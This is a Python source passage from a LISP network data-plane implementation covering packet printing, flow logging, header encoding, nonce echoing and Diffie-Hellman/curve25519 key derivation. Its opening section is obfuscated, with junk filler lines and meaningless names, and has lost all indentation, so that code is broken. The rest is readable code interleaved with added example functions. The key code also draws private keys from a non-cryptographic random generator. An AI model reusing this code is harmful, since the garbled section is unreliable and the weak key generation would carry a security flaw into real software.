dprint ( ( "{} {}, tos/ttl: {}/{}, length: {}, packet: {} ..." ) . format ( bold ( s_or_r , False ) ,
green ( iiI , False ) , self . inner_tos ,
self . inner_ttl , len ( self . packet ) ,
lisp_format_packet ( self . packet [ 0 : 60 ] ) ) )
return
if ( s_or_r . find ( "Receive" ) != - 1 ) :
o00o = "decap"
o00o += "-vxlan" if self . udp_dport == LISP_VXLAN_DATA_PORT else ""
else :
o00o = s_or_r
if ( o00o in [ "Send" , "Replicate" ] or o00o . find ( "Fragment" ) != - 1 ) :
o00o = "encap"
if 62 - 62: I11i . II111iiii * O0 + i1IIi * OoooooooOO + OoooooooOO
if 23 - 23: i1IIi
IIiii1I1I = "{} -> {}" . format ( self . outer_source . print_address_no_iid ( ) ,
self . outer_dest . print_address_no_iid ( ) )
if ( self . lisp_header . get_instance_id ( ) == 0xffffff ) :
i11 = ( "{} LISP packet, outer RLOCs: {}, outer tos/ttl: " + "{}/{}, outer UDP: {} -> {}, " )
i11 += bold ( "control-packet" , False ) + ": {} ..."
dprint ( i11 . format ( bold ( s_or_r , False ) , red ( IIiii1I1I , False ) ,
self . outer_tos , self . outer_ttl , self . udp_sport ,
self . udp_dport , lisp_format_packet ( self . packet [ 0 : 56 ] ) ) )
return
else :
i11 = ( "{} LISP packet, outer RLOCs: {}, outer tos/ttl: " + "{}/{}, outer UDP: {} -> {}, inner EIDs: {}, " + "inner tos/ttl: {}/{}, length: {}, {}, packet: {} ..." )
if ( self . lisp_header . k_bits ) :
if ( o00o == "encap" ) : o00o = "encrypt/encap"
if ( o00o == "decap" ) : o00o = "decap/decrypt"
iiI = "{} -> {}" . format ( self . inner_source . print_address ( ) ,
self . inner_dest . print_address ( ) )
dprint ( i11 . format ( bold ( s_or_r , False ) , red ( IIiii1I1I , False ) ,
self . outer_tos , self . outer_ttl , self . udp_sport , self . udp_dport ,
green ( iiI , False ) , self . inner_tos , self . inner_ttl ,
len ( self . packet ) , self . lisp_header . print_header ( o00o ) ,
lisp_format_packet ( self . packet [ 0 : 56 ] ) ) )
def print_eid_tuple ( self ) :
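  """Return the inner source/destination EIDs as a printable tuple string."""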
return ( lisp_print_eid_tuple ( self . inner_source , self . inner_dest ) )
def get_raw_socket ( self ) :
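  """Return the per-instance-id raw socket used for multi-tenancy, or None when the default socket should be used (or, with LISP_ENFORCE_BINDTODEVICE set, the packet should be dropped)."""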
i1oO00O = str ( self . lisp_header . get_instance_id ( ) )
if ( i1oO00O == "0" ) : return ( None )
if ( i1oO00O not in lisp_iid_to_interface ) : return ( None )
if 72 - 72: o0oOOo0O0Ooo % o0oOOo0O0Ooo + iII111i + I1ii11iIi11i / Oo0Ooo
i1i1111I = lisp_iid_to_interface [ i1oO00O ]
I1iiIi111I = i1i1111I . get_socket ( )
if ( I1iiIi111I == None ) :
Oo0OOOOOOO0oo = bold ( "SO_BINDTODEVICE" , False )
IIIiii = ( os . getenv ( "LISP_ENFORCE_BINDTODEVICE" ) != None )
lprint ( "{} required for multi-tenancy support, {} packet" . format ( Oo0OOOOOOO0oo , "drop" if IIIiii else "forward" ) )
if ( IIIiii ) : return ( None )
i1oO00O = bold ( i1oO00O , False )
iiIi = bold ( i1i1111I . device , False )
dprint ( "Send packet on instance-id {} interface {}" . format ( i1oO00O , iiIi ) )
return ( I1iiIi111I )
def log_flow ( self , encap ) :
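  """Buffer a flow-log entry for this packet; when the buffer reaches LISP_FLOW_LOG_SIZE or ./log-flows exists, hand the buffer to lisp_write_flow_log on a separate thread."""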
global lisp_flow_log
IIi11III1i = os . path . exists ( "./log-flows" )
if ( len ( lisp_flow_log ) == LISP_FLOW_LOG_SIZE or IIi11III1i ) :
IIIiiII1iIi1ii1i = [ lisp_flow_log ]
lisp_flow_log = [ ]
threading . Thread ( target = lisp_write_flow_log , args = IIIiiII1iIi1ii1i ) . start ( )
if ( IIi11III1i ) : os . system ( "rm ./log-flows" )
return
i1 = datetime . datetime . now ( )
lisp_flow_log . append ( [ i1 , encap , self . packet , self ] )
def print_flow ( self , ts , encap , packet ) :
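  """Format one buffered flow entry (timestamp, encap/decap, outer and inner headers, ports or icmp-seq, any packet error) as a display line."""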
ts = ts . strftime ( "%m/%d/%y %H:%M:%S.%f" ) [ : - 3 ]
o0oO0o0O0o0Oo = "{}: {}" . format ( ts , "encap" if encap else "decap" )
o0O0o = red ( self . outer_source . print_address_no_iid ( ) , False )
iii1I1II1iIii = red ( self . outer_dest . print_address_no_iid ( ) , False )
ii = green ( self . inner_source . print_address ( ) , False )
oOo00O0o = green ( self . inner_dest . print_address ( ) , False )
if ( self . lisp_header . get_instance_id ( ) == 0xffffff ) :
o0oO0o0O0o0Oo += " {}:{} -> {}:{}, LISP control message type {}\n"
o0oO0o0O0o0Oo = o0oO0o0O0o0Oo . format ( o0O0o , self . udp_sport , iii1I1II1iIii , self . udp_dport ,
self . inner_version )
return ( o0oO0o0O0o0Oo )
if ( self . outer_dest . is_null ( ) == False ) :
o0oO0o0O0o0Oo += " {}:{} -> {}:{}, len/tos/ttl {}/{}/{}"
o0oO0o0O0o0Oo = o0oO0o0O0o0Oo . format ( o0O0o , self . udp_sport , iii1I1II1iIii , self . udp_dport ,
len ( packet ) , self . outer_tos , self . outer_ttl )
if ( self . lisp_header . k_bits != 0 ) :
i1OOoO0OO0oO = "\n"
if ( self . packet_error != "" ) :
i1OOoO0OO0oO = " ({})" . format ( self . packet_error ) + i1OOoO0OO0oO
o0oO0o0O0o0Oo += ", encrypted" + i1OOoO0OO0oO
return ( o0oO0o0O0o0Oo )
if ( self . outer_dest . is_null ( ) == False ) :
packet = packet [ 36 : : ] if self . outer_version == 4 else packet [ 56 : : ]
O0000O = packet [ 9 : 10 ] if self . inner_version == 4 else packet [ 6 : 7 ]
O0000O = struct . unpack ( "B" , O0000O ) [ 0 ]
o0oO0o0O0o0Oo += " {} -> {}, len/tos/ttl/prot {}/{}/{}/{}"
o0oO0o0O0o0Oo = o0oO0o0O0o0Oo . format ( ii , oOo00O0o , len ( packet ) , self . inner_tos ,
self . inner_ttl , O0000O )
if ( O0000O in [ 6 , 17 ] ) :
o00OoOo0 = packet [ 20 : 24 ] if self . inner_version == 4 else packet [ 40 : 44 ]
if ( len ( o00OoOo0 ) == 4 ) :
o00OoOo0 = socket . ntohl ( struct . unpack ( "I" , o00OoOo0 ) [ 0 ] )
o0oO0o0O0o0Oo += ", ports {} -> {}" . format ( o00OoOo0 >> 16 , o00OoOo0 & 0xffff )
elif ( O0000O == 1 ) :
II = packet [ 26 : 28 ] if self . inner_version == 4 else packet [ 46 : 48 ]
if ( len ( II ) == 2 ) :
II = socket . ntohs ( struct . unpack ( "H" , II ) [ 0 ] )
o0oO0o0O0o0Oo += ", icmp-seq {}" . format ( II )
if ( self . packet_error != "" ) :
o0oO0o0O0o0Oo += " ({})" . format ( self . packet_error )
if 91 - 91: O0 . I1Ii111
o0oO0o0O0o0Oo += "\n"
return ( o0oO0o0O0o0Oo )
    def is_trace(self):
        ports = [self.inner_sport, self.inner_dport]
        return(self.inner_protocol == LISP_UDP_PROTOCOL and
            LISP_TRACE_PORT in ports)
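
#
# Editor's note (not in the original source): a minimal, self-contained
# sketch of the port-parsing arithmetic print_flow() uses above -- both
# 16-bit ports come out of one 32-bit network-order read. Assumes the
# module-level socket/struct imports.
#
def example_parse_ports():
    wire = struct.pack("!HH", 4342, 4341)          # sport, dport on the wire
    ports = socket.ntohl(struct.unpack("I", wire)[0])
    sport, dport = ports >> 16, ports & 0xffff
    assert (sport, dport) == (4342, 4341)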
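#------------------------------------------------------------------------------
# Editor's note (added): LISP data-plane encapsulation header, per RFC 6830
# section 5.3, built and parsed by lisp_data_header below:
#
#  0                   1                   2                   3
#  0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |N|L|E|V|I|P|K|K|            Nonce/Map-Version                  |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |                 Instance ID/Locator-Status-Bits               |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#------------------------------------------------------------------------------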
LISP_N_BIT = 0x80000000
LISP_L_BIT = 0x40000000
LISP_E_BIT = 0x20000000
LISP_V_BIT = 0x10000000
LISP_I_BIT = 0x08000000
LISP_P_BIT = 0x04000000
LISP_K_BITS = 0x03000000
class lisp_data_header(object):
    def __init__(self):
        self.first_long = 0
        self.second_long = 0
        self.k_bits = 0

    def print_header(self, e_or_d):
        nonce = lisp_hex_string(self.first_long & 0xffffff)
        iid_lsb = lisp_hex_string(self.second_long).zfill(8)

        line = ("{} LISP-header -> flags: {}{}{}{}{}{}{}{}, nonce: {}, " +
            "iid/lsb: {}")
        return(line.format(bold(e_or_d, False),
            "N" if (self.first_long & LISP_N_BIT) else "n",
            "L" if (self.first_long & LISP_L_BIT) else "l",
            "E" if (self.first_long & LISP_E_BIT) else "e",
            "V" if (self.first_long & LISP_V_BIT) else "v",
            "I" if (self.first_long & LISP_I_BIT) else "i",
            "P" if (self.first_long & LISP_P_BIT) else "p",
            "K" if (self.k_bits in [2, 3]) else "k",
            "K" if (self.k_bits in [1, 3]) else "k",
            nonce, iid_lsb))

    def encode(self):
        packet_format = "II"
        first_long = socket.htonl(self.first_long)
        second_long = socket.htonl(self.second_long)

        header = struct.pack(packet_format, first_long, second_long)
        return(header)

    def decode(self, packet):
        packet_format = "II"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(False)

        first_long, second_long = struct.unpack(packet_format,
            packet[:format_size])

        self.first_long = socket.ntohl(first_long)
        self.second_long = socket.ntohl(second_long)
        self.k_bits = (self.first_long & LISP_K_BITS) >> 24
        return(True)

    def key_id(self, key_id):
        self.first_long &= ~(0x3 << 24)
        self.first_long |= ((key_id & 0x3) << 24)
        self.k_bits = key_id

    def nonce(self, nonce):
        self.first_long |= LISP_N_BIT
        self.first_long |= nonce

    def map_version(self, version):
        self.first_long |= LISP_V_BIT
        self.first_long |= version

    def instance_id(self, iid):
        if (iid == 0): return
        self.first_long |= LISP_I_BIT
        self.second_long &= 0xff
        self.second_long |= (iid << 8)

    def get_instance_id(self):
        return((self.second_long >> 8) & 0xffffff)

    def locator_status_bits(self, lsbs):
        self.first_long |= LISP_L_BIT
        self.second_long &= 0xffffff00
        self.second_long |= (lsbs & 0xff)

    def is_request_nonce(self, nonce):
        return(nonce & 0x80000000)

    def request_nonce(self, nonce):
        self.first_long |= LISP_E_BIT
        self.first_long |= LISP_N_BIT
        self.first_long |= (nonce & 0xffffff)

    def is_e_bit_set(self):
        return(self.first_long & LISP_E_BIT)

    def get_nonce(self):
        return(self.first_long & 0xffffff)
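
#
# Editor's note (not in the original source): a minimal encode/decode
# round-trip sketch for lisp_data_header, assuming this module's
# socket/struct imports and the LISP_*_BIT constants above.
#
def example_data_header_roundtrip():
    hdr = lisp_data_header()
    hdr.instance_id(1000)
    hdr.nonce(0xabcdef)

    wire = hdr.encode()                   # 8 bytes, network byte order
    copy = lisp_data_header()
    if (copy.decode(wire)):
        assert copy.get_instance_id() == 1000
        assert copy.get_nonce() == 0xabcdef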
class lisp_echo_nonce(object):
    def __init__(self, rloc_str):
        self.rloc_str = rloc_str
        self.rloc = lisp_address(LISP_AFI_NONE, rloc_str, 0, 0)
        self.request_nonce_sent = None
        self.echo_nonce_sent = None
        self.last_request_nonce_sent = None
        self.last_new_request_nonce_sent = None
        self.last_echo_nonce_sent = None
        self.last_new_echo_nonce_sent = None
        self.request_nonce_rcvd = None
        self.echo_nonce_rcvd = None
        self.last_request_nonce_rcvd = None
        self.last_echo_nonce_rcvd = None
        self.last_good_echo_nonce_rcvd = None
        lisp_nonce_echo_list[rloc_str] = self

    def send_ipc(self, ipc_socket, ipc):
        source = "lisp-itr" if lisp_i_am_itr else "lisp-etr"
        dest = "lisp-etr" if lisp_i_am_itr else "lisp-itr"
        ipc = lisp_command_ipc(ipc, source)
        lisp_ipc(ipc, ipc_socket, dest)

    def send_request_ipc(self, ipc_socket, nonce):
        nonce = lisp_hex_string(nonce)
        ipc = "nonce%R%{}%{}".format(self.rloc_str, nonce)
        self.send_ipc(ipc_socket, ipc)

    def send_echo_ipc(self, ipc_socket, nonce):
        nonce = lisp_hex_string(nonce)
        ipc = "nonce%E%{}%{}".format(self.rloc_str, nonce)
        self.send_ipc(ipc_socket, ipc)

    def receive_request(self, ipc_socket, nonce):
        old_nonce = self.request_nonce_rcvd
        self.request_nonce_rcvd = nonce
        self.last_request_nonce_rcvd = lisp_get_timestamp()
        if (lisp_i_am_rtr): return
        if (old_nonce != nonce): self.send_request_ipc(ipc_socket, nonce)

    def receive_echo(self, ipc_socket, nonce):
        if (self.request_nonce_sent != nonce): return
        self.last_echo_nonce_rcvd = lisp_get_timestamp()
        if (self.echo_nonce_rcvd == nonce): return

        self.echo_nonce_rcvd = nonce
        if (lisp_i_am_rtr): return
        self.send_echo_ipc(ipc_socket, nonce)

    def get_request_or_echo_nonce(self, ipc_socket, remote_rloc):

        #
        # If both sides are in request-nonce mode at the same time, the
        # higher RLOC address stays in request-nonce mode and the lower
        # one switches to echoing.
        #
        if (self.request_nonce_sent and self.echo_nonce_sent and remote_rloc):
            local_rloc = lisp_myrlocs[0] if remote_rloc.is_ipv4() else \
                lisp_myrlocs[1]

            if (remote_rloc.address > local_rloc.address):
                mode = "exit"
                self.request_nonce_sent = None
            else:
                mode = "stay in"
                self.echo_nonce_sent = None

            collision = bold("collision", False)
            local_str = red(local_rloc.print_address_no_iid(), False)
            remote_str = red(remote_rloc.print_address_no_iid(), False)
            lprint("Echo nonce {}, {} -> {}, {} request-nonce mode".format(
                collision, local_str, remote_str, mode))

        #
        # We were asked to echo -- return the nonce once and clear state.
        #
        if (self.echo_nonce_sent != None):
            nonce = self.echo_nonce_sent
            echo = bold("Echoing", False)
            lprint("{} nonce 0x{} to {}".format(echo,
                lisp_hex_string(nonce), red(self.rloc_str, False)))
            self.last_echo_nonce_sent = lisp_get_timestamp()
            self.echo_nonce_sent = None
            return(nonce)

        #
        # Stop request-nonce mode if the request has been outstanding
        # longer than the echo interval.
        #
        nonce = self.request_nonce_sent
        last = self.last_request_nonce_sent
        if (nonce and last != None):
            if (time.time() - last >= LISP_NONCE_ECHO_INTERVAL):
                self.request_nonce_sent = None
                lprint("Stop request-nonce mode for {}, nonce 0x{}".format(
                    red(self.rloc_str, False), lisp_hex_string(nonce)))
                return(None)

        #
        # Start request-nonce mode with a new nonce, unless one was
        # requested recently. Tell the other data-plane process via IPC
        # (RTRs run both functions in one process, so no IPC there).
        #
        if (nonce == None):
            nonce = lisp_get_data_nonce()
            if (self.recently_requested()): return(nonce)

            self.request_nonce_sent = nonce
            lprint("Start request-nonce mode for {}, nonce 0x{}".format(
                red(self.rloc_str, False), lisp_hex_string(nonce)))
            self.last_new_request_nonce_sent = lisp_get_timestamp()

            if (lisp_i_am_itr == False): return(nonce | 0x80000000)
            self.send_request_ipc(ipc_socket, nonce)
        else:
            lprint("Continue request-nonce mode for {}, nonce 0x{}".format(
                red(self.rloc_str, False), lisp_hex_string(nonce)))

        self.last_request_nonce_sent = lisp_get_timestamp()
        return(nonce | 0x80000000)

    def request_nonce_timeout(self):
        if (self.request_nonce_sent == None): return(False)
        if (self.request_nonce_sent == self.echo_nonce_rcvd): return(False)

        elapsed = time.time() - self.last_request_nonce_sent
        last_echo = self.last_echo_nonce_rcvd
        return(elapsed >= LISP_NONCE_ECHO_INTERVAL and last_echo == None)

    def recently_requested(self):
        last = self.last_request_nonce_sent
        if (last == None): return(False)

        elapsed = time.time() - last
        return(elapsed <= LISP_NONCE_ECHO_INTERVAL)

    def recently_echoed(self):
        if (self.request_nonce_sent == None): return(True)

        #
        # Was a good echo received within the interval?
        #
        last = self.last_good_echo_nonce_rcvd
        if (last == None): last = 0
        elapsed = time.time() - last
        if (elapsed <= LISP_NONCE_ECHO_INTERVAL): return(True)

        #
        # Otherwise, give a freshly sent request-nonce a grace interval
        # before declaring the echo lost.
        #
        last = self.last_new_request_nonce_sent
        if (last == None): last = 0
        elapsed = time.time() - last
        return(elapsed <= LISP_NONCE_ECHO_INTERVAL)

    def change_state(self, rloc):
        if (rloc.up_state() and self.recently_echoed() == False):
            down = bold("down", False)
            elapsed = lisp_print_elapsed(self.last_good_echo_nonce_rcvd)
            lprint("Take {} {}, last good echo: {}".format(
                red(self.rloc_str, False), down, elapsed))
            rloc.state = LISP_RLOC_NO_ECHOED_NONCE_STATE
            rloc.last_state_change = lisp_get_timestamp()
            return

        if (rloc.no_echoed_nonce_state() == False): return

        if (self.recently_requested() == False):
            up = bold("up", False)
            lprint("Bring {} {}, retry request-nonce mode".format(
                red(self.rloc_str, False), up))
            rloc.state = LISP_RLOC_UP_STATE
            rloc.last_state_change = lisp_get_timestamp()

    def print_echo_nonce(self):
        req_sent = lisp_print_elapsed(self.last_request_nonce_sent)
        echo_rcvd = lisp_print_elapsed(self.last_good_echo_nonce_rcvd)
        echo_sent = lisp_print_elapsed(self.last_echo_nonce_sent)
        req_rcvd = lisp_print_elapsed(self.last_request_nonce_rcvd)
        indent = space(4)

        output = "Nonce-Echoing:\n"
        output += ("{}Last request-nonce sent: {}\n{}Last echo-nonce " +
            "received: {}\n").format(indent, req_sent, indent, echo_rcvd)
        output += ("{}Last request-nonce received: {}\n{}Last echo-nonce " +
            "sent: {}").format(indent, req_rcvd, indent, echo_sent)
        return(output)
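
#
# Editor's note (not in the original source): the request-nonce returned
# by get_request_or_echo_nonce() above carries bit 31 as an in-band
# "please echo this nonce back" marker; the low 24 bits are the nonce
# itself (compare lisp_data_header.is_request_nonce()/request_nonce()).
#
def example_request_nonce_marking():
    nonce = 0x123456                       # 24-bit data-plane nonce
    marked = nonce | 0x80000000            # request-nonce form
    assert marked & 0x80000000             # is_request_nonce() is true
    assert (marked & 0xffffff) == nonce    # nonce survives the marking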
class lisp_keys(object):
    def __init__(self, key_id, do_curve=True, do_chacha=use_chacha,
        do_poly=use_poly):
        self.uptime = lisp_get_timestamp()
        self.last_rekey = None
        self.rekey_count = 0
        self.use_count = 0
        self.key_id = key_id
        self.cipher_suite = LISP_CS_1024
        self.dh_g_value = LISP_CS_1024_G
        self.dh_p_value = LISP_CS_1024_P
        self.curve25519 = None
        self.cipher_suite_string = ""
        if (do_curve):
            if (do_chacha):
                self.cipher_suite = LISP_CS_25519_CHACHA
                self.cipher_suite_string = "chacha"
            elif (os.getenv("LISP_USE_AES_GCM") != None):
                self.cipher_suite = LISP_CS_25519_GCM
                self.cipher_suite_string = "aes-gcm"
            else:
                self.cipher_suite = LISP_CS_25519_CBC
                self.cipher_suite_string = "aes-cbc"

            self.local_private_key = random.randint(0, 2**128 - 1)
            key = lisp_hex_string(self.local_private_key).zfill(32)
            self.curve25519 = curve25519.Private(key)
        else:
            self.local_private_key = random.randint(0, 0x1fff)

        self.local_public_key = self.compute_public_key()
        self.remote_public_key = None
        self.shared_key = None
        self.encrypt_key = None
        self.icv_key = None
        self.icv = poly1305 if do_poly else hashlib.sha256
        self.iv = None
        self.get_iv()
        self.do_poly = do_poly

    def copy_keypair(self, key):
        self.local_private_key = key.local_private_key
        self.local_public_key = key.local_public_key
        self.curve25519 = key.curve25519

    def get_iv(self):
        if (self.iv == None):
            self.iv = random.randint(0, LISP_16_128_MASK)
        else:
            self.iv += 1

        #
        # IV width depends on the cipher: 8 bytes for chacha, 12 for
        # AES-GCM, 16 for AES-CBC.
        #
        iv = self.iv
        if (self.cipher_suite == LISP_CS_25519_CHACHA):
            iv = struct.pack("Q", iv & LISP_8_64_MASK)
        elif (self.cipher_suite == LISP_CS_25519_GCM):
            iv_high = struct.pack("I", (iv >> 64) & LISP_4_32_MASK)
            iv_low = struct.pack("Q", iv & LISP_8_64_MASK)
            iv = iv_high + iv_low
        else:
            iv = struct.pack("QQ", iv >> 64, iv & LISP_8_64_MASK)
        return(iv)

    def key_length(self, key):
        if (type(key) != str): key = self.normalize_pub_key(key)
        return(old_div(len(key), 2))

    def print_key(self, key):
        pub = self.normalize_pub_key(key)
        return("0x{}...{}({})".format(pub[0:4], pub[-4::],
            self.key_length(pub)))

    def normalize_pub_key(self, key):
        if (type(key) == str):
            if (self.curve25519): return(binascii.hexlify(key))
            return(key)

        key = lisp_hex_string(key).zfill(256)
        return(key)

    def print_keys(self, do_bold=True):
        local = bold("local-key: ", False) if do_bold else "local-key: "
        if (self.local_public_key == None):
            local += "none"
        else:
            local += self.print_key(self.local_public_key)

        remote = bold("remote-key: ", False) if do_bold else "remote-key: "
        if (self.remote_public_key == None):
            remote += "none"
        else:
            remote += self.print_key(self.remote_public_key)

        dh = "ECDH" if (self.curve25519) else "DH"
        cs = self.cipher_suite
        return("{} cipher-suite: {}, {}, {}".format(dh, cs, local, remote))

    def compare_keys(self, keys):
        if (self.dh_g_value != keys.dh_g_value): return(False)
        if (self.dh_p_value != keys.dh_p_value): return(False)
        if (self.remote_public_key != keys.remote_public_key): return(False)
        return(True)

    def compute_public_key(self):
        if (self.curve25519): return(self.curve25519.get_public().public)

        key = self.local_private_key
        g = self.dh_g_value
        p = self.dh_p_value
        return(int((g**key) % p))

    def compute_shared_key(self, ed, print_shared=False):
        key = self.local_private_key
        remote_key = self.remote_public_key

        compute = bold("Compute {} shared-key".format(ed), False)
        lprint("{}, key-material: {}".format(compute, self.print_keys()))

        if (self.curve25519):
            public = curve25519.Public(remote_key)
            self.shared_key = self.curve25519.get_shared_key(public)
        else:
            p = self.dh_p_value
            self.shared_key = (remote_key**key) % p

        #
        # Print the computed shared-key only when asked (unit-testing);
        # don't expose it in log files.
        #
        if (print_shared):
            shared = self.print_key(self.shared_key)
            lprint("Computed shared-key: {}".format(shared))

        #
        # Derive the encryption and integrity keys from the shared secret.
        #
        self.compute_encrypt_icv_keys()

        self.rekey_count += 1
        self.last_rekey = lisp_get_timestamp()

    def compute_encrypt_icv_keys(self):
        alg = hashlib.sha256
        if (self.curve25519):
            shared = self.shared_key
        else:
            shared = lisp_hex_string(self.shared_key)

        #
        # The HMAC context mixes both public keys (XORed), so both sides
        # derive the same key material.
        #
        local = self.local_public_key
        if (type(local) != int): local = int(binascii.hexlify(local), 16)
        remote = self.remote_public_key
        if (type(remote) != int): remote = int(binascii.hexlify(remote), 16)
        context = "0001" + "lisp-crypto" + \
            lisp_hex_string(local ^ remote) + "0100"

        key_material = hmac.new(context.encode(), shared, alg).hexdigest()
        key_material = int(key_material, 16)

        #
        # Split the 256 bits of key material: high 128 bits encrypt, low
        # 128 bits authenticate.
        #
        encrypt_key = (key_material >> 128) & LISP_16_128_MASK
        icv_key = key_material & LISP_16_128_MASK
        self.encrypt_key = lisp_hex_string(encrypt_key).zfill(32)
        fill = 32 if self.do_poly else 40
        self.icv_key = lisp_hex_string(icv_key).zfill(fill)

    def do_icv(self, packet, nonce):
        if (self.icv_key == None): return("")
        if (self.do_poly):
            poly = self.icv.poly1305aes
            hexlify = self.icv.binascii.hexlify
            nonce = hexlify(nonce)
            hash_output = poly(self.encrypt_key, self.icv_key, nonce, packet)
            hash_output = hexlify(hash_output)
        else:
            key = binascii.unhexlify(self.icv_key)
            hash_output = hmac.new(key, packet, self.icv).hexdigest()
            hash_output = hash_output[0:40]
        return(hash_output)

    def add_key_by_nonce(self, nonce):
        if (nonce not in lisp_crypto_keys_by_nonce):
            lisp_crypto_keys_by_nonce[nonce] = [None, None, None, None]

        lisp_crypto_keys_by_nonce[nonce][self.key_id] = self

    def delete_key_by_nonce(self, nonce):
        if (nonce not in lisp_crypto_keys_by_nonce): return
        lisp_crypto_keys_by_nonce.pop(nonce)

    def add_key_by_rloc(self, addr_str, encap):
        by_rlocs = lisp_crypto_keys_by_rloc_encap if encap else \
            lisp_crypto_keys_by_rloc_decap

        if (addr_str not in by_rlocs):
            by_rlocs[addr_str] = [None, None, None, None]

        by_rlocs[addr_str][self.key_id] = self

        #
        # Tell an external data-plane about a new decap key.
        #
        if (encap == False):
            lisp_write_ipc_decap_key(addr_str, by_rlocs[addr_str])

    def encode_lcaf(self, rloc_addr):
        pub_key = self.normalize_pub_key(self.local_public_key)
        key_len = self.key_length(pub_key)
        sec_len = (6 + key_len + 2)
        if (rloc_addr != None): sec_len += rloc_addr.addr_length()

        packet = struct.pack("HBBBBHBB", socket.htons(LISP_AFI_LCAF), 0, 0,
            LISP_LCAF_SECURITY_TYPE, 0, socket.htons(sec_len), 1, 0)

        #
        # Cipher-suite and key-length preamble.
        #
        cs = self.cipher_suite
        packet += struct.pack("BBH", cs, 0, socket.htons(key_len))

        #
        # Pack the public key 8 bytes (16 hex digits) at a time.
        #
        for i in range(0, key_len * 2, 16):
            key = int(pub_key[i:i+16], 16)
            packet += struct.pack("Q", byte_swap_64(key))

        #
        # Append the RLOC address, if supplied.
        #
        if (rloc_addr):
            packet += struct.pack("H", socket.htons(rloc_addr.afi))
            packet += rloc_addr.pack_address()

        return(packet)

    def decode_lcaf(self, packet, lcaf_len):

        #
        # Called with lcaf_len 0 when the LCAF header has not yet been
        # parsed off the front of the packet.
        #
        if (lcaf_len == 0):
            packet_format = "HHBBH"
            format_size = struct.calcsize(packet_format)
            if (len(packet) < format_size): return(None)

            afi, x, lcaf_type, x, lcaf_len = struct.unpack(packet_format,
                packet[:format_size])

            if (lcaf_type != LISP_LCAF_SECURITY_TYPE):
                packet = packet[lcaf_len + 6::]
                return(packet)

            lcaf_len = socket.ntohs(lcaf_len)
            packet = packet[format_size::]

        #
        # Parse the security-type LCAF preamble.
        #
        lcaf_type = LISP_LCAF_SECURITY_TYPE
        packet_format = "BBBBH"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        key_count, x, cs, x, key_len = struct.unpack(packet_format,
            packet[:format_size])

        #
        # Advance to the key material.
        #
        packet = packet[format_size::]
        key_len = socket.ntohs(key_len)
        if (len(packet) < key_len): return(None)

        #
        # Reject unsupported cipher suites but still step over the key.
        #
        cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_GCM, LISP_CS_25519_CHACHA,
            LISP_CS_1024]
        if (cs not in cs_list):
            lprint("Cipher-suites {} supported, received {}".format(cs_list,
                cs))
            packet = packet[key_len::]
            return(packet)

        self.cipher_suite = cs

        #
        # Unpack the public key 8 bytes at a time.
        #
        pub_key = 0
        for i in range(0, key_len, 8):
            key = byte_swap_64(struct.unpack("Q", packet[i:i+8])[0])
            pub_key <<= 64
            pub_key |= key

        self.remote_public_key = pub_key

        #
        # The curve25519 library wants the key as a byte string.
        #
        if (self.curve25519):
            key = lisp_hex_string(self.remote_public_key)
            key = key.zfill(64)
            key_bytes = ""
            for i in range(0, len(key), 2):
                key_bytes += chr(int(key[i:i+2], 16))

            self.remote_public_key = key_bytes

        packet = packet[key_len::]
        return(packet)
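
#
# Editor's note (not in the original source): a two-party sketch of the
# exchange lisp_keys implements -- each side feeds the other's public key
# in, computes the shared secret, and derives identical encrypt/icv keys.
# Assumes the curve25519 module this file already uses.
#
def example_lisp_keys_exchange():
    itr = lisp_keys(1)
    etr = lisp_keys(1)
    itr.remote_public_key = etr.local_public_key
    etr.remote_public_key = itr.local_public_key

    itr.compute_shared_key("encap")
    etr.compute_shared_key("decap")
    assert itr.encrypt_key == etr.encrypt_key
    assert itr.icv_key == etr.icv_key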
class lisp_thread(object):
    def __init__(self, name):
        self.thread_name = name
        self.thread_number = -1
        self.number_of_pcap_threads = 0
        self.number_of_worker_threads = 0
        self.input_queue = queue.Queue()
        self.input_stats = lisp_stats()
        self.lisp_packet = lisp_packet(None)
if 38 - 38: I1Ii111 % OOooOOo
if 9 - 9: O0 . iIii1I11I1II1
if 44 - 44: I1ii11iIi11i % IiII
if 6 - 6: OoO0O00
if 82 - 82: iIii1I11I1II1 . I11i / IiII / OOooOOo * II111iiii % oO0o
if 62 - 62: II111iiii
if 96 - 96: I11i % OoOoOO00 * I1ii11iIi11i
if 94 - 94: Oo0Ooo - i1IIi . O0 % Oo0Ooo . ooOoO0o
if 63 - 63: i11iIiiIii % I1ii11iIi11i % I1IiiI . IiII * o0oOOo0O0Ooo + OOooOOo
if 77 - 77: o0oOOo0O0Ooo
if 63 - 63: ooOoO0o * oO0o + ooOoO0o * Ii1I + Oo0Ooo / I1ii11iIi11i
if 15 - 15: O0 . I1ii11iIi11i * I1ii11iIi11i
if 65 - 65: I1Ii111 + O0 % o0oOOo0O0Ooo
if 72 - 72: OOooOOo . OoOoOO00 / II111iiii
if 69 - 69: OOooOOo * II111iiii - ooOoO0o - i1IIi + i11iIiiIii
if 50 - 50: OoooooooOO * i1IIi / oO0o
if 83 - 83: i1IIi
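
#
# Editor's note (not in the original source): a minimal sketch of how a
# capture thread hands a packet to a worker through lisp_thread's queue.
#
def example_thread_handoff():
    worker = lisp_thread("worker-1")
    worker.input_queue.put(b"raw-packet-bytes")    # capture side
    packet = worker.input_queue.get()              # worker side
    assert packet == b"raw-packet-bytes"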
class lisp_control_header(object):
    def __init__(self):
        self.type = 0
        self.record_count = 0
        self.nonce = 0
        self.rloc_probe = False
        self.smr_bit = False
        self.smr_invoked_bit = False
        self.ddt_bit = False
        self.to_etr = False
        self.to_ms = False
        self.info_reply = False

    def decode(self, packet):
        packet_format = "BBBBQ"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(False)

        typeflags, flags, reserved, self.record_count, self.nonce = \
            struct.unpack(packet_format, packet[:format_size])

        #
        # The message type is the high nibble of the first byte; the low
        # bits carry per-type flags.
        #
        self.type = typeflags >> 4
